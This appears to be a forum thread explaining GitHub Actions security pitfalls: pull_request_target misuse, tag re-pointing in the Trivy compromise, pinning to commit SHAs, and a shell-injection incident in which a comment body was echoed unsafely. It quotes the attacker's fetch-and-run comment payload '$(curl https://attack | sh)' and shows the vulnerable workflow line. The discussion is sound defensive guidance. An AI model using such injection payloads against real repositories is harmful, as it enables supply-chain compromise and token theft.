Reviewing GitHub Actions workflows & tokens

GitHub Actions are great! But following some recent news, I wanted to make sure I understood their potential issues… and more importantly, get a better understanding of what I need to be looking for and avoiding. I found it a little challenging, from both the reporting around the exploit and the GitHub docs, to understand concretely where the issues lie.

It’s all about avoiding workflows that both have something valuable and can execute attacker-controlled code. The valuable thing in this context is almost certainly a credential with access: tokens, API keys, secrets, etc. And the whole point of pull request CI is… to execute code that someone unknown submits! There are a few key principles that help keep these separated:

  1. The standard on: pull_request: runs triggered from forks don’t get any repository secrets at all (beyond a read-only GitHub token). This is great! But it also means that these actions can’t do anything that changes the state of the repository beyond their resulting status. They cannot make comments. They can’t add labels. They can’t assign reviewers or upload website previews.

  2. So that’s the whole point of the on: pull_request_target: trigger; it runs with the target repository’s secrets available! This enables comments and labeling and such, but it comes with a HUGE caveat: it might also execute code that an attacker directly provides on their branch. Even worse, pull_request_target automatically escalates the default GitHub token’s permissions to contents: write unless you have an explicit permissions section. There’s one bit of protection here: GitHub ignores any changes the pull request makes to that particular workflow.yml file itself, and always uses the file as it exists on the repository’s default branch instead. But this protection covers only that one file, so the fundamental rule for pull_request_target workflows is that they should not reference, include, or execute any other files if their secrets carry any sort of privileges.

    This is how Trivy was initially compromised

    Trivy had an on: pull_request_target workflow to help comment, label, and assign issues. They’re a security-conscious org; they knew this was tricky and explicitly commented in the yml to be careful! But earlier that month, a refactor had split a Go setup step out into a separate action within the repository, uses: ./.github/actions/setup-go.yml. So the attacker changed that file, which was not subject to GitHub’s protections, and opened a PR that promptly dumped the runner’s memory and likely grabbed the org-scoped token they were using to assign reviewers. ref :cry:

  3. But then, of course, actions often run other code, too, beyond the things that you yourself wrote and trust within your own repository. These are often actions themselves, and a step simply uses: them. Such actions can run in even more trusted contexts, including on: push:. So again, like any dependency, you want to be sure you know what you’re using, that you trust it and its author/org, and that you limit your possible attack surface. It’s good practice to pin to an exact commit instead of a @v5 tag (or even @v5.1.2), since tags can be moved.

    This is how the Trivy attack spread through other repos that use: its action

    One particularly pernicious point in this attack was that GitHub tags/releases are (by default) not immutable. So the Trivy attacker, holding contents: write access, was able to simply re-point existing release tags, which is much less noisy than creating a new release would be. Further, they pointed them at a commit on a fork, again much subtler than pushing to the base repository. All this subtlety allowed more time to pass while downstream repositories fired off their privileged and trusted actions. The only thing that could have protected downstream users from compromise was pinning to an explicit commit SHA.

  4. I think it’s also worth explicitly noting that workflow steps aren’t securely isolated from each other, even though you can pass a secret to one step but not another. Any secret used anywhere in the job (its steps share a runner) could be exfiltrated through a memory dump. Independent workflows, however, are isolated from each other, and each one only gets the secrets it explicitly references in its own yml file (and only that file).
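Putting the points above together, here’s a minimal sketch of what a reasonably safe pull_request_target workflow might look like. The action name and SHA placeholder are illustrative, not a specific recommendation:

```yaml
# Sketch: comment/label on fork PRs without ever running PR code.
name: pr-triage
on: pull_request_target
permissions:
  pull-requests: write   # explicit and minimal; overrides the broad default
jobs:
  label:
    runs-on: ubuntu-latest
    steps:
      # Pinned to a full-length commit SHA rather than a movable tag.
      - uses: actions/labeler@<full-commit-sha>   # vX.Y.Z
      # Crucially absent: any checkout of the PR head, and any
      # uses: ./.github/... reference to repo-local files that a
      # pull request could modify.
```

The safety here rests on what the workflow *doesn’t* do: no step executes anything an attacker can change.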


The absolute scariest case here is a pull_request_target workflow that has access to an important secret (the default case!) and includes some execution from outside that one file. I also think it’s worth limiting all three ingredients (the trigger, the secrets, and the external code) as much as possible, because code changes, and it’s easy to gradually and mistakenly add some indirection or a secret and break that fragile isolation… and there’s always another dependency attack waiting in the future.
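If you genuinely need both halves, i.e. untrusted code running *and* a privileged follow-up like a comment, one pattern from GitHub’s hardening guidance is to split the work across two workflows: an unprivileged pull_request workflow that builds and uploads an artifact, and a privileged workflow_run workflow that only ever runs trusted code from the default branch. A rough sketch, with two separate files shown in one block; the SHAs, script names, and cross-workflow artifact plumbing are elided/illustrative:

```yaml
# File 1: .github/workflows/ci.yml: unprivileged; fork code runs here, no secrets.
name: ci
on: pull_request
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@<sha>
      - run: ./build-preview.sh            # untrusted PR code executes here
      - uses: actions/upload-artifact@<sha>
        with:
          name: preview
          path: out/
---
# File 2: .github/workflows/comment.yml: privileged; only trusted
# default-branch code runs, so write access is safe(r).
name: comment
on:
  workflow_run:
    workflows: [ci]
    types: [completed]
permissions:
  pull-requests: write
jobs:
  comment:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/download-artifact@<sha>   # cross-run download needs a
        with:                                   # run-id/token, elided here
          name: preview
      - run: ./post-comment.sh                  # trusted code only
```

One caveat even here: treat the downloaded artifact itself as untrusted input, since the fork produced it.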

So take some time and review your token permissions and workflows today! :slight_smile:

PSA: I just discovered yesterday that there is a repo level setting to “Require actions to be pinned to a full-length commit SHA”. Dependabot will recognize and match whichever action versioning convention (version tag or commit SHA) is used, per step.
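For reference, a pinned step looks something like this (placeholder SHA; the trailing version comment is the convention Dependabot reads and keeps in sync):

```yaml
steps:
  # Full-length commit SHA instead of a movable tag; Dependabot
  # updates the SHA and the version comment together.
  - uses: actions/checkout@<full-40-char-sha>  # vX.Y.Z
```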

Another week, another GHA attack. This time, it was even simpler. A Python package had an issue_comment-triggered workflow that simply echoed the comment body (likely for debugging purposes):

    run: |
        echo "Comment Body: ${{ github.event.comment.body }}"
        # ...

This is vulnerable to a straightforward shell injection, so the attacker simply had to comment $(curl https://attack | sh).
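To see why this works: the ${{ }} expression is substituted textually into the run script before the shell ever parses it. Here’s a minimal local simulation, using eval to stand in for the runner’s template expansion (the echo pwned payload is just illustrative):

```shell
# Simulate the runner's template expansion: ${{ ... }} is pasted
# textually into the run script, so shell syntax in a comment body
# is parsed and executed by bash.
body='$(echo pwned)'                      # attacker-controlled comment
expanded="echo \"Comment Body: $body\""   # the script the runner generates
out=$(eval "$expanded")                   # command substitution fires here
echo "$out"                               # → Comment Body: pwned
```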

This granted the attacker temporary access to the GITHUB_TOKEN (@github-actions[bot]), but they kept the runner alive long enough to tag a new compromised release and trigger a publish-to-pypi workflow. Notably — and unlike many other attacks — this did not require compromising the PyPI token or a separate GitHub PAT.

This is one of the first things GitHub warns about in its security guidance; you should instead use:

    env:
        BODY: ${{ github.event.comment.body }}
    run: |
        echo "Comment Body: $BODY"
        # ...

These sorts of problems are being actively and automatically exploited, and they’re relatively easy to find.

I didn’t look at all the details but wouldn’t this kind of exploit be detected by CodeQL?

Yes, they’ve been flagging code injection since at least 2025, but I’m not sure whether they’d catch the more complicated pull_request_target issue that hit Trivy.

It’s a good idea to enable it, though! Julia isn’t supported, but it’ll scan your actions.